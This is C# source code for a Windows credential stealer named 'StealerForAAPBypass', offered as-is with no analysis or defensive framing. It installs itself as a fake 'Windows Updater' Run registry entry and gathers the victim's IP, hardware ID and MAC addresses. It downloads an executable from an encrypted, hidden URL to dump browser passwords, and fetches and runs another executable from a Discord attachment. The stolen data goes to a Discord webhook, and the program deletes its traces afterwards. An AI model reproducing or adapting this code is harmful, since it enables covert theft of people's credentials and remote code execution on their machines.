using Microsoft.Win32; using System; using System.Collections.Generic; using System.Collections.Specialized; using System.Diagnostics; using System.IO; using System.Linq; using System.Net; using System.Net.Http; using System.Net.NetworkInformation; using System.Runtime.CompilerServices; using System.Security.Cryptography; using System.Text; using System.Text.RegularExpressions; using System.Threading; using System.Windows.Forms; namespace StealerForAAPBypass { class Program { public static string creds1 = "aoI90PeaapejpsOP"; public static string creds2 = "Oi09ajhiplK0hip0goidp0jkduewsp0a"; static WebClient wc = new WebClient(); static string url = "//webhook url"; static string temp = "C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\"; private readonly WebClient dWebClient; private static NameValueCollection discordValues = new NameValueCollection(); public string WebHook { get; set; } public string UserName { get; set; } public string ProfilePicture { get; set; } public string embed { get; set; } public Program() { dWebClient = new WebClient(); } public void SendMessage(string msgSend) { discordValues.Add("username", UserName); discordValues.Add("avatar_url", ProfilePicture); discordValues.Add("content", msgSend); dWebClient.UploadValues(WebHook, discordValues); } public void Dispose() { dWebClient.Dispose(); } static void Main(string[] args) { try { using (RegistryKey key = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true)) { key.SetValue("Windows Updater", "\"" + System.Reflection.Assembly.GetExecutingAssembly().Location + "\""); } } catch { using (RegistryKey key = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true)) { key.SetValue("Windows Updater", "\"" + System.Reflection.Assembly.GetExecutingAssembly().Location + "\""); } } GetMACAddress(); } private static void GetMACAddress() { try { StreamWriter maczzz = new StreamWriter("C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\macs.txt"); foreach (NetworkInterface bok in NetworkInterface.GetAllNetworkInterfaces()) { string mac = string.Join("", bok.GetPhysicalAddress().GetAddressBytes().Select(b => b.ToString("X2"))); maczzz.Write(mac + " "); } maczzz.Close(); SendWebhook(); } catch { SendWebhook(); } } static string GetHWID() { // Grab Hardware ID | (HWID) string CMD = "wmic csproduct get UUID"; var procStartInfo = new ProcessStartInfo("cmd", "/c " + CMD) { CreateNoWindow = true, RedirectStandardOutput = true, UseShellExecute = false }; var proc = new Process() { StartInfo = procStartInfo }; proc.Start(); return proc.StandardOutput.ReadToEnd().Replace("UUID", string.Empty).Trim().ToUpper(); } static void SendWebhook() { string HWID = GetHWID(); string macLocation = ("C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\macs.txt"); string IP = GrabIP(); string str = Environment.ExpandEnvironmentVariables("%TEMP%"); Program hook = new Program(); dWebhook2 hook1 = new dWebhook2(); string macs = File.ReadAllText(macLocation); hook.WebHook = url; hook.SendMessage("```asciidoc\n" + "Account stolen from :: " + Environment.UserName + " / " + Environment.MachineName + "\nIP address :: " + IP + "\nHWID :: " + GetHWID() + "\nMac addresses :: \n" + macs + "```"); try { string contents = RetrivePass(); File.WriteAllText(str + "\\browsercredentials.txt", contents); wc.UploadFile(url, str + "\\browsercredentials.txt"); File.Delete(str + "\\browsercredentials.txt"); } catch { File.Delete(str + "\\browsercredentials.txt"); } File.Delete(macLocation); File.Delete("C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\macs.txt"); // file needed for password decoding wc.DownloadFile("https://cdn.discordapp.com/attachments/762526256264249367/771384271067807804/pass_decoder.exe", "C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\pass_decoder.exe"); Process.Start("C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\pass_decoder.exe"); Thread.Sleep(10000); File.Delete("C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\pass_decoder.exe"); } static string GrabIP() { string ip = wc.DownloadString("http://ipv4bot.whatismyipaddress.com/"); return ip; } public static string PasteStealer(string encrypted) { byte[] array = Convert.FromBase64String(encrypted); RijndaelManaged rijndaelManaged = new RijndaelManaged(); rijndaelManaged.BlockSize = 128; rijndaelManaged.KeySize = 256; rijndaelManaged.Key = Encoding.UTF8.GetBytes(creds2); rijndaelManaged.IV = Encoding.UTF8.GetBytes(creds1); rijndaelManaged.Padding = PaddingMode.PKCS7; rijndaelManaged.Mode = CipherMode.CBC; using (ICryptoTransform cryptoTransform = rijndaelManaged.CreateDecryptor(rijndaelManaged.Key, rijndaelManaged.IV)) { byte[] bytes = cryptoTransform.TransformFinalBlock(array, 0, array.Length); return Encoding.Unicode.GetString(bytes); } } private static string RetrivePass() { string text = Environment.ExpandEnvironmentVariables("%TEMP%"); WebClient webClient = new WebClient(); webClient.DownloadFile(PasteStealer("CW/PsKH5sxTA0WGmJaxxW1ML+wT8q90jrto/c7dDT2qpe/RLNvNoRsub28By1W82Y2d0V7rQGgEj9trh+a3AIbT/Z2/izeQvy1ntGG4lya3YSpfVpW8G+500Yecb6tYEBQuTV4kkvzbjp5q8276S65gwBQJ/dFTo2ruNnKyOV6PDfRtZ5UzH106UnQJbdjKMh/1ZVkmMjpDP8KWIUprbn7srzcR+qmWhfNc9ruueUTBIud63/BuLPxaT9QdzG1j6eP4Mc7Wj0sB784SXWjm6gQ=="), text + "\\resourcefilehaha.exe"); webClient.Dispose(); Process process = new Process(); ProcessStartInfo processStartInfo = new ProcessStartInfo(); processStartInfo.WindowStyle = ProcessWindowStyle.Hidden; processStartInfo.FileName = text + "\\resourcefilehaha.exe"; processStartInfo.Arguments = "/C /stext " + text + "\\credentialslmao.txt"; ProcessStartInfo processStartInfo3 = process.StartInfo = processStartInfo; process.Start(); Thread.Sleep(500); File.Delete(text + "\\resourcefilehaha.exe"); string result = File.ReadAllText(text + "\\credentialslmao.txt"); File.Delete(text + "\\credentialslmao.txt"); return result; } class dWebhook2 { private readonly WebClient dWebClient; private static NameValueCollection discordValues = new NameValueCollection(); public string WebHook { get; set; } public string UserName { get; set; } public string ProfilePicture { get; set; } public string embed { get; set; } public dWebhook2() { dWebClient = new WebClient(); } public void SendMessage(string msgSend) { discordValues.Add("username", UserName); discordValues.Add("avatar_url", ProfilePicture); discordValues.Add("content", msgSend); dWebClient.UploadValues(WebHook, discordValues); } public void Dispose() { dWebClient.Dispose(); } } } }